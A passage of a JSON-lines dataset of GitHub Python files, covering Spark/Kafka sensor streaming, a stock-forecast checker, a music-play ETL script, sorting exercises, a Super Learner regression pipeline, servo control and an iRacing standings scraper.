verify_fields(rdd, data_path))\n # print(\"File Iteration count-valid_records:\", valid_records.count())\n\n # print(\"====== Processing in verify_sid ======\")\n valid_sensors = valid_records.filter(lambda rdd: verify_sid(rdd, sensor_id, data_path))\n # print(\"File Iteration count-valid_sensors:\", valid_sensors.count())\n # print(valid_sensors.collect())\n\n print(\"====== Processing in extract_info ======\")\n results = valid_sensors.map(lambda rdd: extract_info(rdd, data_path, v_path))\n # used to be rdd of list [identifier, owner, name, data_descriptor, start_time, end_time, datapoints]\n # now just the file within window\n print(\"Result is: \")\n print(results.collect())\n # print(\"File Iteration results:\", results.count())\n\n ################### update buffer (old)\n # global filelist\n # for f in results.collect():\n # if f is not None:\n # filelist.append(data_path+f)\n # print (\"File Length:\", len(filelist))\n ###################\n # process(results) # serialized\n\n\ndef read_udf(data_path: str, file_name: str):\n with open(data_path+file_name) as json_data:\n dt = json.load(json_data)\n sid = dt['input_id']\n osid = dt['output_id']\n time_interval = dt['interval'] # output every interval time\n startt = dt['start_time']\n endt = dt['end_time']\n process = dt['process'] # module.process\n folder = dt['folder']\n win = dt['window']\n slid_win = dt['sliding_window']\n return [sid, osid, time_interval, startt, endt, process, folder, win, slid_win]\n\n\n###### preparing RDD/df for process old method ######\ndef compute_window_check(interval: int, datapath: str, filename: str): # sensor fields number generalize\n global cur_time\n global filelist\n time.sleep(interval)\n\n with open(filename, 'w') as myfile:\n myfile.write(\"Virtual Sensor Result:\\n\") # Future work: add description\n\n while(True):\n print (\"=== Processing upon user's request ===\")\n\n for f in filelist:\n print (\"file:\", f)\n\n output = \"=== Window starting from: \"+str(datetime.fromtimestamp(cur_time))+\" with file length: \"+str(len(filelist))+\" ===\"\n\n with open(filename, 'a') as myfile:\n myfile.write(output+'\\n')\n\n print (output)\n\n # filelist in not null (has file with that window)\n if len(filelist) != 0:\n path = ','.join(filelist)\n filelist = []\n spark = getSparkSessionInstance()\n sc = spark.sparkContext\n # sc.textFile(path).map(lambda x: x.replace('(', '').replace(')','').split(', ')).toDF().show(5)\n df = sc.textFile(path).map(lambda x: [list(eval(a)) if isinstance(eval(a),tuple) else eval(a) for a in x.split(', ',2)]).toDF([\"TimeStamp\",\"Offset\",\"Value\"])\n df = df.filter(df.TimeStamp>=cur_time)\n df.show()\n\n num = df.count()\n stime = df.select(min(df[\"TimeStamp\"])).head()[0]\n etime = df.select(max(df[\"TimeStamp\"])).head()[0]\n\n with open(filename, 'a') as myfile:\n myfile.write(\">> \"+str(num)+\" Records Collected\\n\")\n myfile.write(\">> Start time is: \"+str(datetime.fromtimestamp(stime))+'\\n')\n myfile.write(\">> End time is: \"+str(datetime.fromtimestamp(etime))+'\\n')\n\n dfrdd = df.rdd.map(list)\n method(dfrdd)\n\n else:\n with open(filename, 'a') as myfile:\n myfile.write(\"Sorry. No data available\\n\")\n print (\"Sorry. No data available\")\n\n cur_time += interval\n time.sleep(interval)\n\n################## end of old method ##################\n\n# =============================================================================\n# Kafka Consumer Configs\nbatch_duration = 5 # seconds\n# sc = SparkContext(\"spark://127.0.0.1:8083\", \"Cerebral-Cortex\")\n# master_port = sys.argv[5]\n# sc = SparkContext(master_port, \"Cerebral-Cortex\")\nsc = SparkContext(appName=\"Cerebral-Cortex\")\nsc.setLogLevel(\"WARN\")\nssc = StreamingContext(sc, batch_duration)\nbroker = \"localhost:9092\" # multiple brokers can be passed as comma separated values\n\ndata_path = sys.argv[1]\nif (data_path[-1] != '/'):\n data_path += '/'\n\narchive_path = sys.argv[2]\nif (archive_path[-1] != '/'):\n archive_path += '/'\n\ngroup_id = sys.argv[4]\nconsumer_group_id = \"md2k-test\"+str(group_id)\n\nfile_name = sys.argv[3]\nvirtual_sensor = read_udf(archive_path, file_name)\n\n# supporting one sensor\nsensor_id = virtual_sensor[0]\n\n# compute window duration\ninterval = int(virtual_sensor[2])\n\n# user defined process\nudf_function = virtual_sensor[5]\n\n# start time\ncur_time = int(virtual_sensor[3])\nost = cur_time % 10\n\n# output file\nresult_file = \"../\"+virtual_sensor[1]\n\n# virtual sensor path (user specifiers in input)\nprefix = \"/Users/Shengfei/Desktop/cerebralcortex/\"\nvirtual_sensor_datapath = prefix+virtual_sensor[6]+'/'\n\n# window & slidingg windows\nwin = virtual_sensor[7]\nswin = virtual_sensor[8]\n\nif int(swin.split(\" \")[0]) <= ost:\n ost = ost - int(swin.split(\" \")[0])\n\nos.makedirs(os.path.dirname(virtual_sensor_datapath), exist_ok=True)\n# now supporting one sensor\nsensor_path = virtual_sensor_datapath+sensor_id+'/'\nos.makedirs(os.path.dirname(sensor_path), exist_ok=True)\n\n# Load user defined process\n# module_cus = import_module(udf_function)\nmodule_cus = imp.load_source(udf_function, \"../UDF/\"+udf_function+\".py\")\n# reload(module_cus)\nmethod = getattr(module_cus, \"process\")\n# method is now the function that could be used directly as method(testrdd)\n\nprint (\"User Query -> Compute Window:\"+str(interval)+\", From:\", sensor_id)\nprint (\"User Query -> Detailed Info:\", virtual_sensor)\n\n# compute = Thread(target=compute_window_check, args=(interval, data_path, result_file))\n# compute.start()\n\nspark = getSparkSessionInstance()\nlines = spark\\\n .readStream\\\n .format('text')\\\n .load(sensor_path)\n\ndef ttl(col):\n return list(eval(col))\n\ndef udf1(col):\n return col.split(', ', 2)\n\nsp = udf(udf1, ArrayType(StringType()))\nmyttl = udf(ttl, ArrayType(DoubleType()))\n\ndf = lines.withColumn(\"TimeStamp\", sp(lines.value).getItem(0)) \\\n .withColumn(\"Offset\", sp(lines.value).getItem(1)) \\\n .withColumn(\"col3\", sp(lines.value).getItem(2))\n\ndf = df.withColumn(\"TimeStamp\", df.TimeStamp.cast(\"long\")) \\\n .withColumn(\"Offset\", df.Offset.cast(\"long\")) \\\n .withColumn(\"col3\", myttl(df.col3)).drop(\"value\")\n\ndf = df.withColumn(\"TimeStamp\", df.TimeStamp.cast(\"timestamp\"))\n\ngp = df.withWatermark(\"TimeStamp\", \"30 seconds\")\\\n .groupBy(window(\"TimeStamp\", win, swin, str(ost)+\" seconds\"))\n\n# customized process\n# windowedCounts = df.select(mean(df.col3[0]),mean(df.col3[1]),mean(df.col3[2]))\nwindowedCounts = method(gp, df)\n\nwindowedCounts = windowedCounts.withColumn(\"start\", windowedCounts.window.start.cast(\"string\"))\\\n .withColumn(\"end\", windowedCounts.window.end.cast(\"string\")).drop(\"window\")\\\n .withColumn(\"sid\", lit(sensor_id))\n\nkafka_files_stream = spark_kafka_consumer([\"filequeue\"], ssc, broker, consumer_group_id)\nkafka_files_stream.foreachRDD(lambda rdd: process_valid_file(rdd, data_path, virtual_sensor_datapath, sensor_id, interval)) # store or create DF() process\n\n# Start running the query that prints the windowed word counts to the console\n# update result (query) every 10 seconds\nquery = windowedCounts\\\n .writeStream\\\n .outputMode('complete')\\\n .format('console')\\\n .option('truncate', 'false') \\\n .trigger(processingTime=str(interval)+\" seconds\").start()\n\nssc.start()\nssc.awaitTermination()\nquery.awaitTermination()\n# compute.join()\n\n# /* data records how many */\n# /* simple function */\n","repo_name":"UCLA-ECEM202A-2017F/VirtualSensorCode","sub_path":"CerebralCortex-KafkaStreamPreprocessor/ss_session.py","file_name":"ss_session.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44065644014","text":"#coding=gbk\nimport tushare\nimport os\nfrom define import *\nfrom lib import *\n\nfn = work_catalog + bank_name \nprint(' *** tushare_version: ', tushare.__version__, ' ***\\n')\n\nShareBank = read_data(fn)\n\nflag = ['goodu', 'holding', 'attention']\nseek_date = last_qtr(get_today())\nif( seek_date[4:8] == '0331' ):\n year = str(int(seek_date[0:4])-1)\n seek_date = year + '1231'\nprint('----', seek_date, '----')\ncnt = 0\nfor i in range(len(ShareBank)):\n s = ShareBank[i]\n s.raw_data.reset(s.raw_data)\n if( has_flag(s, flag) ):\n# if( True ):\n# print(i, '---', s.nmcard())\n cnt += 1\n df = s.forecast(s)\n if( df.shape[0] != 0 ):\n for j in range(df.shape[0] ):\n if( df.iloc[j]['end_date'] == seek_date ):\n print('[',i,']---forecast---', s.nmcard(), s.flag)\n print(df)\n df = s.express(s)\n if( df.shape[0] != 0 ):\n for j in range(df.shape[0] ):\n if( df.iloc[j]['end_date'] == seek_date ):\n print('[',i,']---express---', s.nmcard(), s.flag)\n print(df)\n if( i % 250 == 0 ):\n print('===', i)\nprint(cnt)\n \nprint('\\n finished')\n","repo_name":"mbao1996/ShareBank","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34166115906","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"\n INPUT:\n cur: connection cursor to insert the data in DB.\n filepath: path/to/the/song/file.\n PROCESS:\n Process the songs files and insert data into dimension tables: artists and songs.\n \"\"\" \n # open song file\n df = pd.read_json(filepath,lines=True)\n\n for value in df.values:\n artist_id, artist_latitude, artist_location, artist_longitude, artist_name, duration, num_songs, song_id, title, year = value\n \n # insert artist record\n artist_data = [artist_id, artist_name, artist_location, artist_longitude, artist_latitude]\n cur.execute(artist_table_insert, artist_data)\n\n # insert song record\n song_data = [song_id, title, str(artist_id), year, duration]\n cur.execute(song_table_insert, song_data)\n \n\ndef process_log_file(cur, filepath):\n \"\"\"\n INPUT:\n cur: connection cursor to insert the data in DB.\n filepath: path of log files.\n PROCESS:\n Process the log files and insert data into dimension tables: time and users.\n \"\"\" \n # open log file\n df = pd.read_json(filepath,lines=True) \n\n # filter by NextSong action\n df = df[df['page']=='NextSong']\n \n\n # convert timestamp column to datetime\n t = pd.to_datetime(df['ts'], unit='ms') \n df['timestamp'] = t\n df['hour'] = t.dt.hour\n df['day'] = t.dt.day\n df['week'] = t.dt.week\n df['month'] = t.dt.month\n df['year'] = t.dt.year\n df['weekday'] = t.dt.weekday_name \n \n # insert time data records\n time_data = df[['timestamp','hour','day','week','month','year','weekday']] \n\n for i, row in time_data.iterrows():\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = df[['userId','firstName','lastName','gender','level']] \n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # insert songplay records\n for index, row in df.iterrows():\n \n # get songid and artistid from song and artist tables\n cur.execute(song_select, (row.song, row.artist, row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n\n # insert songplay record\n songplay_data = (index,row.timestamp, row.userId, row.level, songid, artistid,\n row.sessionId, row.location, row.userAgent) \n cur.execute(songplay_table_insert, songplay_data)\n\n\ndef process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('='*60)\n print('{} files found in {}'.format(num_files, filepath))\n print('='*60)\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n\n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"huseyinelci/DE-DataModelingofSparkifySongPlay","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38663884608","text":"\nlist1 = [4, 8, 9, -1, 10]\n# 리스트 객체에서 제공해주는 sort()를 이용하여 정렬하는 방법\nlist1.sort()\nprint(list1)\nlist1.sort(reverse=True)\nprint(list1)\n\n# 선택 정렬 알고리즘\n# 주어진 리스트 중에서 일단 최솟값을 찾는다.\n# 그 최솟값을 맨 앞에 위치한 값과 교환한다.\n# 맨 처음 위치를 뺀 나머지 리스트를 위와 똑같은 방법으로 루핑하면서 최종적으로 정렬이 이루어진다.\n# **선택 정렬은 제자리 정렬이기 때문에 더블루프를 사용해야 한다.\ndef selectionSort(li):\n cnt = 0\n for i in range(len(li)-1):\n min_idx = i\n for j in range(i+1, len(li)):\n if li[min_idx] > li[j]:\n min_idx = j\n\n if min_idx != i: \n print(li[min_idx], li[i], \"을 교환합니다.\")\n li[i], li[min_idx] = li[min_idx], li[i]\n cnt += 1\n\n print(cnt, \"만큼 교환이 이루어졌습니다.\")\n return li\n\n# 버블 정렬 알고리즘 인접한 두 원소를 검사하여 정렬하는 방법\n# 장점 정확도 높다.\n# 단점 데이터가 많아지면 질수록 속도가 떨어진다.\ndef bubble_sort(li):\n list_length = len(li) # 길이가 10\n for i in range(list_length-1):\n for j in range(list_length-i-1):\n # 4, 6, 1, 10\n if li[j] > li[j+1]:\n li[j], li[j+1] = li[j+1], li[j]\n #print(i, j, j+1, li)\n print(i, j, j + 1, li)\n\nif __name__ == \"__main__\":\n li = [4,6,1,10,7,-7,-100,15,30,15]\n selectionSort(li)\n print(li)\n print(\"----------------------\")\n li1 = [4, 6, 1, 10]\n bubble_sort(li1)\n print(li1)\n\n rows = 3\n cols = 15\n s = []\n\n for row in range(rows):\n s += [[0] * cols]\n print(\"s =\", s)\n\n rows = 3\n cols = 15\n s = [([0] * cols) for row in range(rows)] # 리스트 함축\n print(\"s =\", s)\n\n s = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, 15]]\n # 행과 열의 개수를 구한다.\n rows = len(s)\n cols = len(s[0])\n for r in range(rows):\n for c in range(cols):\n print(s[r][c], end=\"\\t\")\n print()\n\n a = ['a', 'b', 'c']\n n = [1, 2, 3]\n x = [a, n]\n print(x)\n\n","repo_name":"ggSeo-code/TIL","sub_path":"220725/listsort.py","file_name":"listsort.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2736718052","text":"# -*- coding: utf-8 -*-\n\n# import modules\nimport numpy as np\nimport pandas as pd\nimport csv\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.svm import SVR\nfrom sklearn.neural_network import MLPRegressor\n\nfrom sklearn.model_selection import cross_val_predict\n\nfrom scipy.stats import uniform as sp_rand\nfrom sklearn.model_selection import RandomizedSearchCV\n\nfrom sklearn import preprocessing\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# function for cutting the uncertenty using gmc and gv\ndef cutWithUncertainty(data,tvGmc,tvGv):\n\t# data: pandas dataframe\n\tscreenGmc = data.loc[lambda df: df.gmc > tvGmc, :]\n\tscreenGv = screenGmc.loc[lambda df: df.gv < tvGv, :]\n\treturn screenGv\n\ndef main():\n\t#============================================================================================\n\t# load data\n\tall = pd.read_csv(\"allLabelledData.csv\")\n\t# calculate the cutting values for gmc and gv\n\tgmc = all.loc[:,'gmc']\n\tgv = all.loc[:,'gv']\n\ttvGmc = np.median(gmc)\n\ttvGv = np.median(gv)\n\tGmc40 = np.percentile(gmc,40)\n\tGv50 = np.percentile(gv,50)\n\t# cut off the uncertenty\n\tcutdata = cutWithUncertainty(all,Gmc40,Gv50)\n\t# scale the trainning set and testing set\n\ty = cutdata.iloc[:,[6]]\n\tx = cutdata.iloc[:,[4,5,9,10,13,14,15,16,17,18,19]]\n\tX_train, X_test, y_train, y_test = train_test_split(x,y,test_size=0.3,random_state=12345)\n\tscalerX = preprocessing.StandardScaler().fit(X_train)\n\tscalery = preprocessing.StandardScaler().fit(y_train)\n\tX_train = scalerX.transform(X_train)\n\ty_train = scalery.transform(y_train)\n\tX_test = scalerX.transform(X_test)\n\ty_test = scalery.transform(y_test)\n\t#============================================================================================\n\n\t#============================================================================================\n\t# Construct the new dataset for Super Learner\n\t#============================================================================================\n\t# Linear Model\n\tlmd = LinearRegression()\n\tpredicted_lmd = cross_val_predict(lmd, X_train, y_train, cv=10, n_jobs=32, pre_dispatch='2*n_jobs')\n\t# SVR Model\n\tclf_svr = SVR(C=4000,gamma=0.5)\n\tpredicted_svr = cross_val_predict(clf_svr, X_train, y_train, cv=10, n_jobs=48, pre_dispatch='2*n_jobs')\n\t# MLP Model\n\tclf_mlp = MLPRegressor(activation=\"relu\", alpha=1e-06, hidden_layer_sizes=550)\n\tpredicted_mlp = cross_val_predict(clf_mlp, X_train, y_train, cv=10, n_jobs=48, pre_dispatch='2*n_jobs')\n\t# New dataset\n\tSLData = np.concatenate((predicted_lmd,predicted_svr,predicted_mlp,y_train.T),axis=1)\n\t# Save the New dataset\n\tstrFileName = 'SLData.csv'\n\twith open(strFileName, 'wb') as csvfile:\n\t\tnp.savetxt(csvfile,SLData, delimiter=\",\")\n\n\t#=============================================================================================\n\t# Construct Super Learner with Train set (Ridge Regression)\n\t#=============================================================================================\n\t# Randomized Search for Algorithm Tuning\n\t# prepare a uniform distribution to sample for the alpha parameter\n\tparam_grid = {'alpha': sp_rand()}\n\t# create and fit a ridge regression model, testing random alpha values\n\tSuper_Model = Ridge()\n\trsearch = RandomizedSearchCV(estimator=Super_Model, param_distributions=param_grid, n_iter=100, cv=10, n_jobs=32, pre_dispatch='2*n_jobs')\n\trsearch.fit(SLData[:,(0,1,2)], SLData[:,3])\n\tSuper_Learner_Train = rsearch.best_estimator_\n\tfilename_super_learner_train = 'Super_learner_train.pkl'\n\tpickle.dump(Super_Learner_Train, open(filename_super_learner_train, 'wb'))\n\n\t#==============================================================================================\n\t# Fit the models with all Train data\n\t#==============================================================================================\n\t# linear\n\tlmd_train = LinearRegression()\n\tlmd_train.fit(X_train, y_train)\n\t# save the model to disk\n\tfilename_Linear = 'Linear_train.pkl'\n\tpickle.dump(lmd_train, open(filename_Linear, 'wb'))\n\t# SVR\n\tclf_svr_train = SVR(C=4000,gamma=0.5)\n\tclf_svr_train.fit(X_train, y_train)\n \t# save the model to disk\n\tfilename_svr_train = 'SVR_train.pkl'\n\tpickle.dump(clf_svr_train, open(filename_svr_train, 'wb'))\n\t# MLP\n\tclf_mlp_train = MLPRegressor(activation=\"relu\", alpha=1e-06, hidden_layer_sizes=550)\n\tclf_mlp_train.fit(X_train, y_train)\n\t# save the model to disk\n\tfilename_MLP_train = 'MLP_train.pkl'\n\tpickle.dump(clf_mlp_train, open(filename_MLP_train, 'wb'))\n\n\t#==============================================================================================\n\t# Store the new super data of test\n\t#==============================================================================================\n\tlp = lmd_train.predict(X_test)\n\tsp = clf_svr_train.predict(X_test)\n\tmp = clf_mlp_train.predict(X_test)\n\tp_test_3 = np.concatenate((lp.T,sp.T,mp.T),axis=1)\n\tsuper_test = Super_Learner_Train.predict(p_test)\n\ttest_all = np.concatenate((p_test,super_test.T,y_test),axis=1)\n\t# Save the New dataset\n\tstrFileName = 'test_all.csv'\n\twith open(strFileName, 'wb') as csvfile:\n\t\tnp.savetxt(csvfile,test_all, delimiter=\",\")\n\n\nif __name__ == '__main__': main()\n","repo_name":"steve-saul/SpatialModelingCode","sub_path":"Python/machine_learning/Super_Learner_analysis.py","file_name":"Super_Learner_analysis.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72249871467","text":"#1(1):采用字典的形式统计每个字母的个数:不用考虑字母加入字典的代码,只考虑字母出现次数的叠加\n# chars=['a','c','x','d','p','a','c','a','c','a']\n# ans={}\n# for i in chars:\n# if i in ans:\n# ans[i]=ans[i]+1\n# else:\n# ans[i]=1\n# print(ans)\n'''ans2={}\nfor i in chars:\n if i in ans2:\n continue\n else:\n ans2[i]=chars.count(i)\nprint(ans2)\ntest=0\na=''\nfor i in ans2.keys():\n if ans2[i]>test:\n test=ans2[i]\n a=i\nprint(test, a)'''\n#2输入姓名进行检测,如果不存在则加入列表\n'''persons=[{'name':'zhangsan','age':'18'},\n{'name':'lisi','age':'20'},\n{'name':'wangwu','age':'19'},\n{'name':'herry','age':'21'}\n]\ns=input(\"输入姓名\")\nfor i in persons:\n if s in i.values():\n print(\"姓名已存在\")\n break\n else:\n age=int(input(\"请输入年龄\"))\n dic={};\n dic[\"name\"]=s\n dic['age']=age\n persons.append(dic)\n break\nprint(persons)'''\nstudents = [\n {'name': '张三', 'age': 18, 'score': 52, 'tel': '1388888998', 'gender': 'female'},\n {'name': '李四', 'age': 28, 'score': 89, 'tel': '1388666666', 'gender': 'male'},\n {'name': '王五', 'age': 21, 'score': 95, 'tel': '1365588889', 'gender': 'unknown'},\n {'name': 'jerry', 'age': 20, 'score': 90, 'tel': '156666789', 'gender': 'unknown'},\n {'name': 'chris', 'age': 17, 'score': 98, 'tel': '13777775523', 'gender': 'male'},\n {'name': 'jack', 'age': 23, 'score': 52, 'tel': '13999999928', 'gender': 'female'},\n {'name': 'tony', 'age': 15, 'score': 98, 'tel': '1388888888', 'gender': 'unknown'}\n]\ncount=0\nkids=0\nfor student in students:\n if student[\"score\"]<60:\n count+=1;\n print(student[\"name\"]+\"不及格,成绩为\"+str(student[\"score\"]))\nfor student in students:\n if student[\"age\"]>18:\n kids+=1\nprint(\"未成年人数为\"+str(kids)+\" \")\nfor student in students:\n if student[\"tel\"].endswith('8'):\n print(student[\"name\"]+\"的手机尾号为8\")\nmax=0\nmaxName=\" \"\nfor student in students:\n if student[\"score\"]>max:\n max=student[\"score\"]\n maxName=student['name']\nprint(\"最优学生是\"+maxName+\"成绩为\"+str(max))\ni=0\nfor student in students:\n if student['gender']is 'unknown':\n students.remove(student)\nfor student in students:\n print(student,end=\"\\n\")","repo_name":"zykgithub1/pythonClass","sub_path":"pyCharm/test_3_19.py","file_name":"test_3_19.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72581629226","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\nimport threading\nimport time\nimport sys\nimport RPi.GPIO as GPIO\nimport smbus\nimport math\nimport datetime\n\n# Setze GPIO-Modus\nGPIO.setmode(GPIO.BCM)\n\nclass Servo:\n def __init__( self, pin, direction ):\n\n GPIO.setup( pin, GPIO.OUT )\n self.pin = int( pin )\n self.direction = int( direction )\n self.servo = GPIO.PWM( self.pin, 50 )\n self.servo.start(0.0)\n\n def cleanup( self ):\n self.servo.ChangeDutyCycle(self._henkan(0))\n time.sleep(0.3)\n self.servo.stop()\n GPIO.cleanup()\n\n def currentdirection( self ):\n return self.direction\n\n def _henkan( self, value ):\n return 0.05 * value + 7.0\n\n def setdirection( self, direction, speed ):\n for d in range( self.direction, direction, int(speed) ):\n self.servo.ChangeDutyCycle( self._henkan( d ) )\n self.direction = d\n time.sleep(0.1)\n self.servo.ChangeDutyCycle( self._henkan( direction ) )\n self.direction = direction\n\n\ndef moveServo():\n servo_pin = 19\n s = Servo(servo_pin,0)\n for i in range(14):\n print(\"Drehe nach links...\")\n s.setdirection( 100, 80 )\n #10\n time.sleep(1)\n print(\"Drehe nach rechts...\")\n s.setdirection( -100, -80 )\n time.sleep(1)\n s.cleanup()\n\ndef main():\n moveServo()\n\n\ntry:\n servo_pin = 19\n s = Servo(servo_pin,0)\n for i in range(14):\n print(\"Drehe nach links...\")\n s.setdirection( 100, 80 )\n #10\n time.sleep(1)\n print(\"Drehe nach rechts...\")\n s.setdirection( -100, -80 )\n time.sleep(1)\n s.cleanup()\n\nexcept KeyboardInterrupt:\n s.cleanup()\n","repo_name":"gimfo/gimpublic","sub_path":"src_joy_py_prj/04_Servo_demo/Servo_wave.py","file_name":"Servo_wave.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222732500","text":"import itertools\n\nmod = 10007\nn = int(input())\nfactorial = [1]\ntemp = 1\nfor i in range(1,n+1):\n temp *= i\n factorial.append(temp)\nplus_square2m1 = n%2\ncase = 0\ncomb = itertools.combinations(range(n//2+2),2)\nfor idx in comb:\n square2m1 = 2*idx[0] + plus_square2m1\n square1m2 = idx[1] - idx[0] - 1\n square2m2 = (n//2+2) - idx[1] - 1\n case += factorial[square2m1+square1m2+square2m2] // factorial[square2m1] // factorial[square1m2] // factorial[square2m2] % mod\nprint(case%mod)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj11727.py","file_name":"boj11727.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28010774453","text":"import os\nimport sys\nimport urllib\nimport click\nfrom ir_webstats.client import iRWebStats\n\nirw = iRWebStats()\n\n\n@click.command()\n@click.argument(\"club\")\n@click.argument(\"season\")\n@click.option(\"--top\", default=3, type=int)\n@click.option(\"--user\", prompt=\"Username\")\ndef ir_clubchamp(club, season, top=3, user=None, password=None):\n '''iRacing Club Champions - find the topX from your club on iRacing official seasons.\n\n To get all Top10 from Club Brazil:\n\n > ir_clubchamps Brazil 2014.3 --top=10\n '''\n year, quarter = map(int, season.split('.'))\n if hasattr(sys, \"frozen\"):\n os.environ[\"REQUESTS_CA_BUNDLE\"] = os.path.join(os.path.dirname(sys.executable), \"cacert.pem\")\n if os.path.isfile('cookie.tmp'):\n irw.login()\n else:\n password = click.prompt('Password', hide_input=True)\n irw.login(user, password)\n if not irw.logged:\n click.echo (\n \"Couldn't log in to iRacing Membersite. Please check your credentials\")\n else:\n champs = acquire_champ_list(club, year, quarter, top)\n print_champs(champs)\n\n\ndef find_club_id(clubname):\n for club_id in irw.CLUBS:\n shortclubname = urllib.parse.unquote(irw.CLUBS[club_id][\"shortclubname\"])\n if shortclubname == clubname:\n return irw.CLUBS[club_id][\"id\"]\n else:\n raise KeyError(\"Club ID not found for {}\".format(clubname))\n\n\ndef get_seasons(year, quarter):\n '''\n Return seasons ID for the given year-quarter\n\n :param int year:\n :param int quarter:\n :rtype: list\n '''\n for yearquarter in irw.YEARANDQUARTER:\n if yearquarter['year'] == year:\n for quarters in yearquarter['quarters']:\n if quarters['quarterid'] == quarter:\n return quarters['seasons']\n else:\n raise KeyError(\"Seasons for {}-{} not found\".format(year, quarter))\n\n\ndef acquire_champ_list(club, year, quarter, tops=3):\n champs = []\n club_id = find_club_id(club)\n seasons2process = irw.all_seasons()\n if seasons2process is None:\n sys.exit(\"Exiting (Unable to load Season data)...\")\n if year:\n seasons2process = [s for s in seasons2process if s[\"year\"] == year]\n if quarter:\n seasons2process = [s for s in seasons2process if s[\"quarter\"] == quarter]\n with click.progressbar(seasons2process, label=\"Requesting Series Stats\") as seasons:\n for season in seasons:\n if not season[\"isOfficial\"]:\n continue\n for carclass in season[\"carclasses\"]:\n class_id = int(carclass[\"id\"])\n if class_id in [0]:\n continue\n# click.echo(\"Getting results for {} ({})\".format(season[\"seriesshortname\"], season[\"seasonid\"]))\n try:\n resp = irw.season_standings(season[\"seasonid\"], class_id)\n except Exception as exc:\n# click.echo(\"- Error {}\".format(exc))\n continue\n standings = resp[0]\n for i, driver in enumerate(standings[:tops]):\n if driver[\"clubid\"] == club_id:\n pos = i+1\n champs.append((pos, driver, season, carclass))\n return champs\n\n\ndef print_champs(champs):\n seasons = {}\n for champ in champs:\n seasonchamps = seasons.setdefault(champ[2][\"seasonshortname\"], [])\n seasonchamps.append(champ)\n for season_name in sorted(seasons):\n click.echo(season_name)\n seasonchamps = seasons[season_name]\n for pos, driver, season, carclass in sorted(seasonchamps, key=lambda x: x[0]):\n driver_name = urllib.parse.unquote(driver[\"displayname\"])\n driver_name = driver_name.replace(\"+\", \" \")\n if season[\"multiclass\"]:\n series_name = \"{} ({})\".format(season[\"seriesname\"], carclass[\"shortname\"])\n else:\n series_name = season[\"seriesname\"]\n if pos == 1:\n pos_text = \"Champion\"\n elif pos == 2:\n pos_text = \"2nd Place\"\n elif pos == 3:\n pos_text = \"3rd Place\"\n else:\n pos_text = \"{}th Place\".format(pos)\n click.echo(\"{0:28} {1:9} - {2}\".format(driver_name, pos_text, series_name))\n click.echo()\n\n\nif __name__ == '__main__':\n click.echo(\"= iRacing Club Champions =\")\n click.echo()\n ir_clubchamp()","repo_name":"igortg/ir_clubchamps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71101141229","text":"\"\"\"\nCreated on Mon Oct 29 20:27:42 2018\n\n@author: bird\n实时展示传感器数据波形情况。\n\"\"\"\n\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom Tkinter import * #引入模块\nimport threading\nimport serial\nimport numpy as np\nimport csv\nimport time\nimport string\nimport binascii\nimport os\nimport math\nimport tkMessageBox\nimport time\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport string, sys, time, re, math, fileinput, glob, shutil\nimport numpy as np\nimport scipy as sp\nimport time\nimport matplotlib.pyplot as plt\nimport random\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\nfrom scipy import signal \n\n\nfrom sklearn import tree\nmodel = tree.DecisionTreeRegressor()\nstopClass = []\n\nglobal num,flag,f,f1,f2,f3,flagWriteData,cnum,startSaveStr,bakNameStr, gestureTypeStr, nameStr,z,actflag1,z1,z2,actflag2,actflag3,zz,data\nz = [[0 for i in range(300)] for i in range(4)]\nz1 = [[],[],[],[]]\nz2 = 